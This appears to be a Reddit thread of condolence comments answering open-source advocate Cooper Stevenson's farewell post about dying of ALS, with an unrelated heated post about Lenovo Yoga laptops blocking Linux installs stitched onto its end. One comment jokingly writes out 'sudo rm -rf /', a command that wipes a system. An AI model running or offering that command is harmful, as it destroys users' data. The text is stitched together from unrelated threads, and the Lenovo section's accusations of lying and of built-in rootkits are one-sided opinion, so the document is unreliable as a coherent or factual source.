I, Cooper Stevenson, have ALS and will die in the coming days. I want to tell you as the Open Source community that I love you and what you stand for.

I hope I did my part and I love you all.


Fair Winds,


Cooper Stevenson
[This Cooper Stevenson?](https://www.cnet.com/news/open-source-battle-rages-in-oregon/)
>> Open-source battle rages in Oregon
>>
>> ...Cooper Stevenson, one of the bill's main backers and a member of the Mid-Willamette Valley Linux Users Group ...

You ~~were~~ *are* an extremely valuable part of the community, and will be missed.  I've followed your work since back then, when I noticed your contributions on the political side.    That's a very important and often overlooked part of the open source movement.

Hopefully others can help fill the gaps left behind.

Your contributions will live on far longer than many people's.

---

*[EDIT Yes, he also contributed technologically.  I just mentioned the part that I remembered (and always will remember) him for.  His work in Oregon directly helped cities I've worked with make policies for using open source software.   Also check out his [epic morse keyboard he made for himself](https://www.reddit.com/r/HamRadio/comments/91t3b8/portable_cw_key_update_details_in_comments/), just after [he was diagnosed](https://www.reddit.com/r/HamRadio/comments/8yufoc/portable_cw_keyer_and_display/).]*
There is no better proof that someone truly cared about something when they spend their last few precious moments thinking about it. It's inspiring to see someone care about open source at such a deep level. I hope we as a open source community can carry on your unfinished work and achieve what you dreamed. Farewell.
Ouch, right in the feels! My father was a huge Linux advocate. He died of ALS in 2011.

He's very last moments were spent using emacs with his knee over a morse code interface to write patches for open source utilities. The last thing he ever really said to me was over email... 
"""
ACCEPTed
COMMITed
RESOLVEd
BOO-YAH!
""'"

It was such a simple patch relative to his careers work, but it was a powerful moment for him.

I am very sad to hear of your illness, and I hope you are able to savor the last of your days. The community is lucky to have the likes of you.

Cheers!
I wish you a peaceful whatever comes next.
Goodbye friend. Don't know what else to say.
Hello Cooper.

I'm very sorry to hear that but at the same time I'm hopeful because it would take having peace to share such a thing instead of despairing over the unknown.

Fare Well!
Life isn’t measured in longevity. See you on the otherside...
Thank you and goodbye.
I know you did your best. I am proud of you.
Cooper,

Thank you for all you have done. I wish your loved ones strength in the days to come.

Farewell.

Arjen
Thank you, for taking some of your time to address the community. 

Goodbye
May the four winds blow you safely home.
I don't know you from a hole in the ground, Cooper, but your courage in coming right out and telling everyone about your situation is amazing. ALS is a terrible affliction and I'm sorry you've been forced to endure it. I wish you a peaceful passing and all the strength in the world to your family and friends.

(And if God's not running open source software, I'm sure you'll show him the error of his ways.)
Goodbye mate, now it's time to rest.
Cooper, I don't know you but I wish I did. Thank you for this moment of perspective. Go well.
To be fair I don't know who you are, just went to your personal page to try to learn about you, and for what I read you seem to be a wonderful person, so even if I didn't knew you until a few moments ago, it pains me to know you won't be here. Good luck, and may your remaining time be filled with love from the people you care the most.
sudo umount /dev/bcak
sudo rm -rf /
reboot

Gentle journeys, friend.
Thanks and keep on pushing to upstream.
I wish you peace in the coming days and beyond.
Thank you Cooper. At the end we all meet there, so see you :)
I’m sorry to hear that...
I am so sorry... farewell!
Thank you for everything, farewell ❤️
Much love to you, and yours, and theirs <3
Sorry to hear that dude
You are fucking legend, that post shows how much you care about sharing code (open source community) which also means that you love helping. Farewell, that was a really strong post ♥️
Goodbye fellow earthling, i never heard you or read your comments but i wish that you can go with peace and dignity.

Whatever (or if) something lays ahead of you thanks for coming bye and share your love for the Open Source Community with us for a last time.

Farewell,

[https://www.youtube.com/watch?v=dULOjT9GYdQ](https://www.youtube.com/watch?v=dULOjT9GYdQ)

<3
thank you for everything you've done, you've been a massive boon to the community. peace
We love you too. I wish we all could have you around longer.
Thanks for all the fish! 

And the beautiful work you contributed.
Open source represents the noblest of human aspirations. You did your part with excellence. Rest easy my friend.
Thank you so much for your own dedication to all things open source and may you have a gentle upward slide to the parklands of eternity.
Thank you for all of the work you put into the free coding world for the generations to come, even though the universe got your code wrong.

You did us much better than it did you. For that fire and fight, we thank you. 

Now may the great debugger in the sky catch you gently and grant you more freedoms than you ever had here.

Good night sweet prince, until your next Hello World!
May the winds of death be kind to you, we will miss you, no matter how much we know you. Farewell, Cooper.
See you on the other side buddy :)
Thank you and farewell
Farewell! <3
I'll make something great and name it in your legacy, if you don't mind. Fairwell.
What the.... Aoch, so sorry to hear that, thank you for taking the time to write it, and thank you for your efforts within the community.
Thanks for your love and may fair winds be at your back.
Cooper, from all of us who were with Linux Journal, we thank you for your years of dedication and hard work. It's been a long, good, and worthwhile fight, my friend. *hugs*
This is so heartbreaking. I hope only good things await you on the other side. May you have peace, brother.
Farewell, mon ami. As you pass, please remember that the Open Source community is as strong as it's ever been. We'll hold down the fort when you go, and there will be many more fighters to change the guard to when we cross over ourselves. An idea can never die, especially not one rooted in liberty and freedom like ours.
We all wish you a peaceful end along your loved ones.. Farewell.
I don't know who you are but your post made me sad.

Farewell stranger.
We are indebted to you. Thanks for all you do.
Farewell
Thank you for your contributions. Oregon will loose a strong advocate. May you drift away peacefully.
Thank you for your contributions. Rest well.
Good luck and thank you for all of your hard work. I hope that your transition is peaceful.
Farewell, Cooper, we all love and will miss you

Goodbye
Good luck, friend
Thank you for your contributions. We’ll all be joining you soon enough.
I wish you a peaceful death.
Pouring one out for the homie tonight
Goodbye friend ! Thanks a lot for what you have done for the open source community.
Fair winds and following seas my friend
You’ll be still alive on our both memories (physical and cyber) for long long time. Goodbye with love.
Your contributions are eternal.
Gracias por todo. Eres querido  ❤
Thank you for all you have done and good luck in the great beyond.
Good travels brother, you together with like-minded made the world a truly better place.
Thank you for leaving your mark on the world.
Goodbye, Cooper.  Reading through your site and your Reddit comments, you were a man of distinction and lived your life well.  In the few minutes I've had to learn about you, I am impressed, humbled, and inspired, and wish you the best as you move to whatever lies beyond this life.  God be with you.
You contributed to make the life of a lot of people a bit better. 

Fairwell.
The fact that in your last days you're spending it thinking about this community really tells some great things about you. Love you too, brother.
Hi. I don't know you, but my heart is filled with sadness for you as I read this. I lost my Aunt to ALS a few years ago, and it was not good. I hope you find what you want, in whatever comes next. Whether that be peace, Valhalla, heaven, or whatever it is. Thank you for your contributions to our society, and please, know that we all love you. Even the ones like me, who don't know you.
Farewell
Farewell fellow member of our community!
So long, man. Hope you make this step with peace of mind.
Farewell ❤️
Farewell Cooper, thank you for all you have done.
Farewell.
I hope you find peace
Thank you so much for everything. I wish you peace.
Farewell
Wow. Goodbye Cooper.
see you in the other side bud. Save me a seat?
Wherever you go, drive slow homie
I don't know what to say other than I'm sorry and that we are part of a great community and that if you need anything to make yourself comfortable, don't hesitate to ask.
Thank you so much for being a part of this community.

May the Lord smile upon you.
As a K12 IT technician, open-source solutions are a godsend. You seem to be heavily involved in the progression of all types of open source. For that, I thank you for fighting the good fight man. Know that you have a fan in me at least. Until next time friend.
You have indeed done your part.  I send my love but say no goodbyes, I'll see you on the other side where all of us Billions return!
God speed, sir. We all thank you, you most certainly did your part. Rest easy.
Thank you friend much love from Austin Texas <3
ACK with love
Take care homes
Godspeed Mr.Stevenson
Godspeed on your coming adventures.
Goodbye. I wish you a peaceful transition.
Goodbye and all the best for the time that you have.
Good luck.
Farewell and heartily thank you for your contributions.
Farewell
Goodbye, friend!
Sorry to hear, rest well
Goodbye friend, you will be missed
Bis dorthin.
thank you and see you in the afterlife
Thank you for everything, farewell!
I don’t know you, but I’m sad to see you go.
Goodbye, and rest in peace

with love,

grass
Thanks for your contributions, Cooper, you will never be forgotten.
Put in a good word for us man. I know I will sure as hell need it!
May the winds carry you, wherever you desire
We love you too.
Fuck the body.. code lives forever!  And heroes too... thanks for fighting the good fight
I'll refer to Keanu Reeves' succinct quote:

“I know the ones who love us will miss us.”
May you be peacefully cast to void :-(
See you on the other side Cooper. Farewell. We love you as well.
Godspeed and may the next chapter, whatever that is, be everything you hoped it would be and more.
You did. May the starch bind you to the carbon of this world. raMEN
I don't know you but love you nonetheless.
I wish you little trouble and great joy as you navigate homeward. Take care.
Goodbye :( .. Beam him up Scotty
Thank you for everything you done! Good luck and farewell
Thank you for helping to make the world a better place.

With love,

An internet stranger.
Thank you Cooper for all of your contributions and I hope these next few days are as pleasant as can be.
Peace and goodwill to you my fellow human. You will be in my thoughts.
We'll see eachother again after this life, mate. Until then, though, we both lived to see Microsoft commit open source code to GNU/Linux!
Return to the :Source: buddy.
I love you too
Thank you for everything. Good bye with love!
Farewell, friend. We love you too. Thank you for sharing your light with us.
You did good. Fair winds friend.
Godspeed brother.
I’m at a loss for words. You will be missed.
You’ve done a good job, Cooper; you’re all set.  Love you back.
Goodbye.

I may be just some stranger on the Internet, but know your contributions won't be forgotten.

Thank you for all you've done.  May whatever comes next treat you well.
Fair winds to you too brother.
Don't know who you are but i have dedicated one moment to think about you, be aware that there is people that will keep you in their mind after you have departed, you are not alone, be strong and defiant and face with a big smile with determination for the great trip ahead.
Never met you but may your next chapter be a happy and merry one!
Very real post and love you too.
See you on the flip side!   I'm sure we'll find something akin to Linux there as well!
I did not know you in life, but I have read about you, and I am saddened to hear of your impending passing. May we all meet on the other side in a heavenly hackathon.
Goodbye and thank you.
Cooper, I'm not personally familiar with your work in the open source world, but I wish to thank you for the contributions that others here have noted.
Friend, I am an Open Source user myself - and a pastor in the Christian tradition.

I would be remiss if I didn't offer to talk with you about an Open heart to the Source of all. Please PM me if you'd be willing to hear me out. I won't take the space to advocate for my faith here, and I won't PM you because I don't know if you'd be interested to hear what I have to say, so I'll leave the ball in your court.

Grace and peace to you.
You've had a positive contribution on the world. I hope when it's my time to go I can say the same.
Thank you, you have helped the world move forward in a way that will help everyone. Thank you for your work and your support.
If I knew I only had a couple days to live, I would eat more ice cream and other junk food than any man should.
Wow 😢
Until Valhalla... Thank you sir for your work and contributions.
I wish you peace and harmony.
Farewell and thank you. You will not be forgotten.
See you on the other side someday,buddy. Sorry to see you go so soon. May you rest in peace.
I wish your family well. Thank you for all that you have done.
Goodbye friend.
peace brother ...
So sorry to hear that. Farewell.
Bye cooper! I hope your loved ones are with you :)
Thank you for being a part of this community.
Fairwell. I wish you peace in whatever ahead.
From a fellow Oregonian... Peace.
Thank you for your contributions to the community. o7
Goodbye :(
Happy Trails Cooper.
Thank you and farewell.
Many thanks and may you be around loved ones. Open Source is with you always and forever.
This, this is how I know that Reddit has real people inside of it. Linux can only learn from those, such as yourself, Mr. Stevenson!   


With Dignity!
Thank you for your contributions. I dont know you nor have I ever interacted with you but I wish you all the peace and love that I have.
Goodbye friend.
Safe travels, friend.
Good luck and God speed, thank you for you're contributions to the open source community.
Thank you for all you did for us.
Thank you for doing what you have done.

You did more than millions of other Open Source supporters have done, do not wonder or regret.

Your efforts paid off for everyone and you have made a mark on this world that will not be forgotten.

Farewell, I wish you the best.
<3 Godspeed <3
Thanks for being along for the ride, Cooper. May your last moments be the best they could be.
The love and fellowship that you have brought to this world through a single post is beyond amazing. Know that you are amongst friends and surrounded by love. God bless you Cooper.
Your contributions will serve as an inspiration for many of us. You've gone above and beyond, and it's now our job to do our part.

My deepest sympathies and wishes of strength and goodness for you and loved ones.
I hope you go painlessly surrounded by things that make you happy.
Farewell friend. I do not know you, but some part of me wishes I did. Your fight and passion for what you believe in is inspiring to me as a comp science major. Don't ever doubt yourself to think if you didn't do enough, your efforts and contributions are invaluable and appreciated whether if results are not what you wanted. It's the journey, not the destination. I wish you the very best
Death is nothing at all. 

It does not count. 

I have only slipped away into the next room. 

Nothing has happened. 

&#x200B;

Everything remains exactly as it was. 

I am I, and you are you, 

and the old life that we lived so fondly together is untouched, unchanged. 

Whatever we were to each other, that we are still. 

 

Call me by the old familiar name. 

Speak of me in the easy way which you always used. 

Put no difference into your tone. 

Wear no forced air of solemnity or sorrow. 

&#x200B;

Laugh as we always laughed at the little jokes that we enjoyed together.

Play, smile, think of me, pray for me. 

Let my name be ever the household word that it always was. 

Let it be spoken without an effort, without the ghost of a shadow upon it. 

&#x200B;

Life means all that it ever meant. 

It is the same as it ever was. 

There is absolute and unbroken continuity. 

What is this death but a negligible accident? 

&#x200B;

Why should I be out of mind because I am out of sight? 

I am but waiting for you, for an interval, 

somewhere very near, 

just round the corner. 

&#x200B;

All is well. 

Nothing is hurt; nothing is lost. 

One brief moment and all will be as it was before. 

How we shall laugh at the trouble of parting when we meet again!

&#x200B;

\- HENRY SCOTT HOLLAND
o7
Goodbye with love.
Oh... Farewell...
I wish you the best outcome.
You may die but your contributions will live on forever
Kudos... ❤️❤️❤️
Adios, Muchacho.
Thank you for all that you have done for the community
Thank you for what you've given, both to the community we're apart of and to the ones you love.
Goodbye and thank you for everything
<3
Hi Cooper Stevenson I wish you to be cured.
, good seas and God speed on your journey. May the journey be worth the wait. And to your family, prayers and thoughts to them as well.
Thank you for everything you have done. We are all indebted to you.
Don’t know about Linux or about you but I hope it gives you comfort that someday als will be like polio and gone and no will else have to suffer. Safe man.
Thanks for everything. Au revoir.
❤️
Have a smooth journey and farewell!
I wish i had something meaningful to say.

Empathy hits hard, we are part of this community...

Hasta la vista.
Your memory will live on forever. Goodbye friend.
goodbye and godspeed
See you in the next life, brother.
Good luck on the other side, tomodachii
Goodbye
Rest in peace Cooper.
Thanks for all you’ve done for us Cooper. May your next journey be as awesome as this one.
Thank you for all your contributions to the community - you've more than done your part. Love you too
Thank you. You will not be forgotten. I wish you peace. Know that you made your mark and achieved what most can only dream of.
Dude, I don't know who you are, but this is sad.

Off you go, then. 

Fare well.
Thank you and farewell.
So long, and thanks for all the fish. May you live forever in your code and the lives you have touched.  Thank you for sharing your time on this Earth on helping others. 

F
GNU Cooper Stevenson.

Thanks.
You fought a good fight.  Now your fight is over and will be taken up by others.  Thank you for your service.
Thank you and Farewell friend... If heaven exists, make it open source ! :)
Fare thee well.
I hope you'll live your remaining days with peace and joy . Thank you for everything.
Farewell. Go in peace.
Cooper, thanks for your contributions to the open source community. It may not mean much coming from a stranger in the internet, but we're all in this together, and open source above all has been a unifying force that binds us together as a community of like-minded individuals.

I hope the best for you and your family. And may you be at peace as this chapter draws to a close. I do believe in an afterlife, but whatever you believe just know that everything will turn out okay, and your memory will live on.
We should make a Wikipedia page for him so people would know who it was and what did for the humanity !
Thank you for your service.
Farewell <3
Thank you for everything! I wish for a miracle!
I don't know you, but you seem to have done a lot of good in your life.

I'm sorry you are being forced off the ride.
Thank you for everything you've done, Cooper; Rest peacefully, friend. <3
Hey man, I love you man.
Thank you so much!
Farewell, my friend.
Thank you for your service. I hope you see all the beautiful things people had to say about you as a sign that you've done your part. The torch will be carried forward.
Thanks for all your help, sorry to see you go
Thank you for your work. Oregon will miss you.
Thanks for everything you have done.
I'm so sorry to hear this. Thank you for everything you've done for us. 

Open source software is as much a part of the basis of eternal human knowledge as math. Your contributions will benefit humanity for as long as it exists.
Goodbye buddy. Thank you for all that you have done.
Goodbye and thanks for everything you've done :)
Farewell and may the thought that your contributions to humanity and your legacy will live on long after you're gone and possibly long after all of us here are gone. The world will continue to thrive from your eternal contributions.
History will remember you as a fighter, in every aspect of your life.
Goodbye and Thank you.
Holy shit. I never even knew who you were, and this hit me pretty hard.
We'll mourn, but we won't forget what you've done for this community.

♥️
It's not the length of one's life that matters, but what oyu do with it. You have done much good. Thank you!

I hope you get a serene passing.
You fought the good fight. I wish you peace in the coming days. Thank you for what you have done.
This is macabre to say the least, but all my heart's genuine commiserations, dear fellow human. May your last few days be peaceful.
This breaks my heart. I don’t know you obviously but I hope to see you in the other side
I don't know what you did, but you sound important and if you have something to do with the open source world then... Thank you for contributing. May your last days be the best they can.
Your work will be remembered. Thank you, sir. 

To everyone else, please consider donating: http://www.alsa.org/donate/
Thank you for contributing so much to our shared vision.
https://www.youtube.com/watch?v=QNv7SGZyPYQ

I'm sorry to hear that. I know of no words that would prepare you for what's to come. I hope you enjoyed your time on this earth, and that you made other people (including yourself) happy. I hope the video above helps you in your journey, as you return "From the earth"
Thank you for all you have done, your contributions to society won't be forgotten. You're a good person, and you have done well.
You will be remembered.
We love you too. May you have a peaceful trip, feeling the wind on your face.

You did your part.
Godspeed
Good bye Cooper, may your soul rest in peace.
Thank you
Thank you for everything that you have done. May whatever lies beyond be everything you hope, Mr. Stevenson. <3
Thank you for everything you have done and stane for. Have a safe trip, we will see you on the other side.
Well you got a lifetime supply of Reddit premium at least.
Fair winds...
Rest in Power brother
God speed Cooper, and meet the next life with the bravery that you've shown in this one.
May your soul rest in peace
Heroes never dies
See you on the other side, I wish you peaceful passing.
Didn't know about you but now I do. You're truly an inspiration! Rest easy...
Goodbye, and thank you for everything you have done for us.
Goodbye sir. Sad I will not be able to see you in certain. You have done good things. I salute you.
Safe travels. We've never met but you will be in my thoughts as you transition. Thank you for your dedication to your family and to the community.
Hats off to you. Sending good thoughts and prayers your way.
Thank you for what you gave the human race and fair travels on the other side
O7 <3
I saw you from r/all. I never spoke with you or had any influence from you. But I know you lived. Sorry to see you go.
O7, just learning how to use Linux and am inspired to learn more by what I just read. As an computer engineering student my goal is to develop quantum computing as well as make my own flavor of Linux one day. You will be missed even though I have only just learned about your crazy advances in the open source community.
Goodbye, friend. I have no clue who you are or what you do but we, you and i, appreciate the same thing and ive made bonds with people over much much less. I care that you care enough to reach out and express your feelings; to be vulnerable and honest, showing love for a community and movement which has given so much.

May your journey come to peace. Sweet dreams my dude.
I’m not familiar with your work and I’m a bit new to this community but from what I’m seeing here, you’ve been very influential so I appreciate you being an inspiration to so many! Even in this moment, taking the time to mention your condition, has already garnered quite the response and you didn’t even have to do that.

This comment may get buried somewhere deep in the thread but I want you to know, I admire and respect you. Be at peace when this fight is finally over and you come face to face with your Creator.

Godspeed to you good sir.
Thank you for what you did to the community. Goodbye.
I just downloaded and installed Linux for the first time ever today. Someday I hope to understand the extent of your contribution. Until then thank you for increasing all of our potential.
Sorry to hear the bad news. Your wife is an amazing person and you are very lucky to have found her. I hope she rejoices in all the happy Times and memories you’ve made over the years. May you find peace and may she always be comforted by thoughts of you in the coming days. Peace be upon you.
Thank you for fighting for us.
Thank you for everything. We love you.
Goodbye Cooper! Rest easy and thank you for all your contributions. You're a wonderful person.
My best to you, Cooper!
A heartfelt thank you from Germany for all your contributions.
May peace be with you. Farewell and thank you for everything.
You sir have done more for humanity than many of us in our combined lifetimes, thank you for your contributions & farewell.
Never used Linux. Never uttered a word on this sub either. I just read your goodbye and I just want to say that I hope you find peace. Your post has reminded me that life is too short. You've inspired me to better myself and achieve what I set out to achieve in life. Thank you.

Rest easy mate X
I’m primarily a Windows guy, British and I’ll admit to having never heard of you Cooper but god speed son. May your rest in the ether be painless and filled with old friends, for we will all be reunited eventually.
 this is sad :(
Thanks for all you did, Thank you for everything!!!
Thank you.
Thank you for everything.
Thank you for everything you've done for us. You've made my world a better place without even knowing me. Thank you again.
Goodbye... ][ :'(
Farewell Cooper. It's a great injustice in the world that there aren't cures for things like this. 😔
Goodbye, everyone will miss you ❤️❤️❤️
Farewell, Monsieur Stevenson.
We love you
Goodbye, and thank you for your service.
You are one of the people who inspired me to get into programming, now I'm in my first 2 weeks of IT studies c:
I don't know about Linux, I stumbled across this post by chance. I just want to say, from one person to another, that I really care about you. I am genuinely sorry you are in this position. I can't imagine what it must be like. I wish you strength and all the best. I hope that everything goes smoothly for you, and for your family or people that care about you or know you, I hope they are okay and they can celebrate your life.
Your love and respect are returned. Thank you for your contributions to Open Source, and to the community.

Go in peace, friend. We will remember you.
goodbye with love
I didn't know who you were before this post, but now I do, thank you for your work, thank you for this post making me aware of it, and thank you for your love, we need more of that in this world. 

So there you go, in your final days, you have reached many strangers, including myself, given them knowledge they didn't have before, and kind words, who for some people may be the only kind words they see today.

Have a safe journey my friend, I hope it is everything we all wish it to be.

We love you too.

Fair winds, (love this by the way, I will use it, and every time I do I will remember where I read it first)
Thank you for being part of all of this. I really appreciate everything you did and everything this community stands for.
wish you much strength!
Do we have a link to contribute ? Can someone make a new post with all informations to help Stevenson’s wife. 
Good by Cooper Stevenson
Goodbye, I hope you found peace with your self. And I hope you are happy with what you accomplished, as is the community.

You have helped many, and inspired others to follow in your footsteps.
Goodbye, friend.
You have done so much, I am honoured to have lived in the same time as you.
Goodbye, brother
So long and thanks for all the fish! 👊🏾🙏🏾
Until Valhalla my friend. May you find peace. Thank you for all your hard work and dedication. You made this planet a better place.
Thank you for everything you've done to keep the public's information available to all.  Godspeed to you.
The day will come for all of us.

Farewell and thank you. You will not be forgotten.
Sending my love and prayers. You are merely going where we will all soon follow; see you on the other side friend.
OSS, with its communal cordiality and compounding progress, is a shining example of what humanity can achieve if we work together. Know that you have stood on the shoulders of giants and rest easy knowing that those who come after you will stand on your shoulders. Your work lives on.
From someone who knows of you from a friend who is heavily in the community and has spoken of you with geek hero worship, I'm so sorry to hear of this.

Know that you will be missed, the world will be less for you not being in it.

I hope your last days are peaceful as possible. I'm watching the thread as well, and will donate to your wife.
Mr Cooper Stevenson, Mrs Deanna Stevenson

I guess all that's left to say is a BIG THANK YOU!
Mr Stevenson,

While I am not exactly a very..... emotional person, your work in the open source community has been extremely impactful, and will live on for years to come. You have left your mark on the world, left a legacy behind. Wherever you may go next, you will be forever remembered. 

If there is a heaven, I hope you may go there. 

Fare you well.
Goodbye friend.
See you on the other side.
Carpe diem bros
Thank you for everything. I wish you peace now and always.
Thank you for everything you've done.
Thank you for all that you have done, you will be remembered!
I'll echo what some other people say and just state that although I wasn't familiar with you until I looked you up just now, I appreciate the efforts people smarter than me put in to improve and advocate for Free and Open Source Software.  I fall far short of the goal, but it sounds like you've done a \*lot\* to leave the world a better place than you found it, and I thank you for it.
Sorry
Go with love brother
Goodbye friend and fellow admin. May your travels be joyful and pleasant wherever you may go.
May the Force be with You, Mr Stevenson.

o7
Farewell, i hope many people you love will be around you during your last time !
Good bye and Thanks, i just pray for you
Goodbye, you are and will continue to be an inspiration to the Open Source community. Thank you for everything you've done, I look forward to seeing you on the other side.
Your legacy will live on in your contributions and the people they have helped! Thank you for all you have done.
Thank you for being a great human being, happy transcendence
Thanks for all you have done.

Best wishes
Travel well my friend.
So long and thanks for all the Fish. Be at peace.
Thank you sir
Thank you for all your contributions and efforts. You will be missed.
Godspeed, friend. Your work will not be forgotten. Thank you.
Damn it, Cooper. 
Good luck and lots of strength for you and yours dearly
Cooper, I don't know you - but as a fellow human being, I wish you farewell my friend! I can see that you've made an amazing impact in Oregon! May the light guide you through.
Thank you for your contribution Mr. Stevenson. God bless you
Thanks for everything you did for the OSS community, your work means a lot for all of us. You fought for a better tomorrow, I'm really thankful for you. I wish you the best afterlife possible. ❤️
thank you for everything you have done!
I hope you the good future , thank you for all your hard work.

Life or death .... Stay strong friend , we humans are all in the same cycle.
Goodbye, rest well friend.
It's not about how long have you lived, it's about how have you lived. Time for someone else to pick up the torch.

Goodbye, and see you on the other side.
Thanks for being part of our community, you will be truly missed. God bless you.
My grandmother died of ALS.  It's something in the back of my mind as well..

I too, think coding is one way to have your legacy live on.  Create and share and try to make the world a little better one line of code at a time.    Thanks for all your contributions!
GNU/RIP you brave soul. Thanks for everything.
Thank you for all your work
God bless you man ! You made an indelible positive mark in humanity !
May peace find you, friend.
Wish you peace. I thank you for everything you have done for the open source movement. Thank you.
Oh no... :,( thank you for everything!
Safe journeys, friend
Godspeed and appreciate the contributions!
:'-(
Thank you for your contribution, Coop! I'm proud to have lived alongside legends who shaped the FOSS ecosystem.

It's the ninjas cutting onions, I swear.
Cooper,
You got me a little teary eyed there. Thank you for what you’ve done for the open source community. I will remember what you’ve done and so many others will too. Your wife sounds like a very strong person as well. I wish you the best in what is to come. Who knows? Maybe there is another fight for you to take on in the next life and if there is, it would seem whoever is in that life will be fortunate to have you.

An aspiring open source developer,
Matt C.
Good luck with whatever comes next. I'm not a religious person myself, but even as a rationalist, intrinsic consciousness (as opposed to emulated intelligence) is still an absolute mystery, and while I don't believe in any particular deity or type of immortality, essentially all bets are off. 
Fingers crossed for you for a nice farewell, an easy passage and - if it exists - a great afterlife.
In this world you will live on in the bits and bytes of machines and neurons of us. Farewell!
Thank you for all your work.
❤
.
Thank you for everything. Farewell
Love you too bud. You're in my thoughts.
who downvoted this deserves to go to hell
Fly high ❤️
thank you for your work and wish you much strength for the remaining way. fly away
Thank you for your contributions and I wish to return the love equally to you in your final moments. God bless.
Aww man.
I'm really sad to hear this, Goodbye friend.
I do not know who you are, nor what your accomplishments consist of, but I stand strong for the nature of Open Source software, and I thank you for all you have done for us, as a community. Rest in peace, you shall live on in our hearts.
Thank you for all you've given. I hope you go painlessly.

Farewell
Update: Lenovo just updated the BIOS for the Yoga 710, another system that doesn't allow Linux installs. Wanna know what they changed? Update to TPM (secret encryption module used for Digital Restrictions Management) and an update to the Intel Management Engine, which is essentially a backdoor rootkit built into all recent Intel processors (but AMD has their version too, so what do you do?). No Linux support.
Priorities...

Update: The mods at Lenovo Forums are losing control of the narrative and banning people and editing/deleting more comments. http://imgur.com/a/Q9xIE | But it appears that some people just aren't buying it anymore. http://imgur.com/a/1K1t5

----

Edit: I sent a letter of complaint to the Federal Trade Commission and the Illinois Attorney General's office.

You can view this letter here:

https://www.reddit.com/r/linux/comments/54gtpc/letter_to_the_federal_trade_commission_regarding/

----

Lenovo's regional HQ address and phone number:

Address: 1009 Think Pl, Morrisville, NC 27560
Phone:(855) 253-6686

Edit: Someone started a change.org petititon. I don't think they are a native English speaker, but I went ahead and signed it anyway. A moderator on Lenovo Forums deleted the link and told people that "campaigning is not allowed", so here's the link. I don't know if it'll make a difference, but screw them. They were hoping this week's news would be all puff pieces about the new Yogas and now they have to deal with this instead. If everyone could share it on Facebook and Twitter after they sign it so their friends can do so too, that would be most appreciated.

https://www.change.org/p/lenovo-demand-that-lenovo-provide-bios-update-to-enable-linux-installation

Please sign this and then tell Lenovo that you won't be buying products from them until this is fixed. They have Facebook and Twitter accounts!

Facebook: Lenovo
Twitter: Lenovo
Lenovo Customer Service 800-565-3344
Press 2 for all other models and then wait through the recording and press 1 for laptops.
----

A hardware hack re-enables AHCI mode and allows Linux to install on the Yoga 900, undermining Lenovo's statement.

https://www.reddit.com/r/linux/comments/542c8t/hardware_hack_enables_linux_support_on_lenovo/

The solution is too complex for the average user, but proves that Lenovo could have made this laptop Linux-compatible by just leaving AHCI mode enabled or as an option in the BIOS setup, instead of hiding it.
----
----
My response regarding Microsoft and Lenovo's effective joint statement: 

Microsoft and Lenovo got together and agreed on the lies that they would tell in response to this. The lie is that it's a driver problem. That Linux just doesn't support the fake RAID mode that they forced the storage into when they deliberately sabotaged the BIOS by writing new code to hide AHCI mode and also code to reset the BIOS to their fake RAID mode if the user used EFI Shell to try setting it to AHCI. Let me make my position clear, that Lenovo is lying through their teeth just like they did with Superfish malware incident. They lied until they couldn't lie anymore. Linux should not have to support the RAID mode because the mode should be able to be changed to AHCI, which is fully compatible with Linux, by the user in about 20 seconds. 

If, by some chance, some Very Smart People ever figure out a way to make the SSD visible again, I would STRONGLY advise never upgrading the laptop's firmware again, lest Microsoft and Lenovo find something else to break and then tell us "Oops. Better run Windows 10 so you can use our 360 degree hinge! Have we told you about our 360 hinge?".

I believe that if Linux ever gains driver support for the forced fake RAID configuration, that future laptops from Lenovo will just toggle something else so Linux doesn't work on them for a while.

I would strongly advise avoiding the Yoga 910 and Yoga Book when they come out until we find out whether they broke those models as well.

Even if your intent is to never run Linux, Lenovo is the first PC maker I've seen that ships computers that you can't even realistically (for the average user) reinstall Windows on. I will _never_ buy another Lenovo computer again and I will advise others to avoid them whenever the chance arises. I had to spend about an hour googling random support topics before I found a recommendation to use Universal Extractor to get their Windows storage driver to use in a Windows installation thumb drive. Then I had to find a beta version of Universal Extractor that supported the archive format in the setup program just to dig the Intel RST driver out of their godawful installer so that I can slipstream it into a Windows installer.

Most people will have to pay to ship it back to Lenovo if Windows needs to be reinstalled, and will be unable to use the computer for weeks, and it'll probably have some sensitive, confidential, work-related information on the SSD that someone at Lenovo could copy and steal while it's in their repair center.

Their arrogant forum moderator "Andy_Lenovo" posted Lenovo's ridiculous press release to their forum and then marked it as solved. The only part of it that is true is that Linux will likely never be able to install on Yoga laptops, because they are "designed for Windows 10", which in my experience has been unstable and full of bugs (like updates stalling out requiring manual installation from offline packages, telling me to reboot everytime I pair my bluetooth headphones, etc.). Unfortunately, in addition to Lenovo and Microsoft's lies, Matthew Garrett wrote some more horsefeathers when he blamed Linux for not supporting a storage mode that shouldn't even be in use anyway. He apparently has a long record of apologizing for Microsoft and misleading people, and it's a shame that he's in the FSF. Of course, the FSF has put some other people in high places that have proceeded to undermine their mission in the past, like Miguel de Icaza.

Maybe it's true that you need "special drivers" to make Windows run, but Microsoft doesn't care. It breaks Linux on Lenovo laptops and then makes it look like the problem is in Linux, when it's actually in Microsoft's storage driver and Microsoft is undoubtedly leaning on Intel to keep the way the RST driver does power management a secret.

To make sure that you don't accidentally buy a Signature Edition computer, on the demo model, click the start (Windows logo) button, click "about your PC", and under Windows 10 it will say "Signature Edition" if it's part of this program. Also, if you do buy a laptop to see if Linux supports it, then make sure you try installing Linux before the return period expires. If the Linux installer in Live mode can't see your SSD, stop. Unplug the thumb drive, turn the computer off, and I would recommend that you return it. Just tell the store that you decided that you didn't need it or something. It's true.. Nobody needs this kind of aggravation.

END of my response to Lenovo and Microsoft.

(You do not need to ask for my permission to repost this response in its entirety anywhere else, in hard copy, or on a website.)

----



I got a reply from Lenovo on my Best Buy review about why the BIOS on my Yoga 900 ISK2 UltraBook has been set to stop people from using Linux.

---
Lenovo Product Expert
September 20, 2016
This system has a Signature Edition of Windows 10 Home installed. It is locked per our agreement with Microsoft.
---

This is related to the discussion going on Lenovo's forum's about why the SSD is locked in a proprietary RAID mode that Linux doesn't understand. Laptops known to be affected include the Yoga 900 ISK2, Yoga 900S, and Yoga 710S, which all have the same issue according to posts I've read on Lenovo's Linux forum. I was also told in a PM that the 13ISK for Business has the same issue.

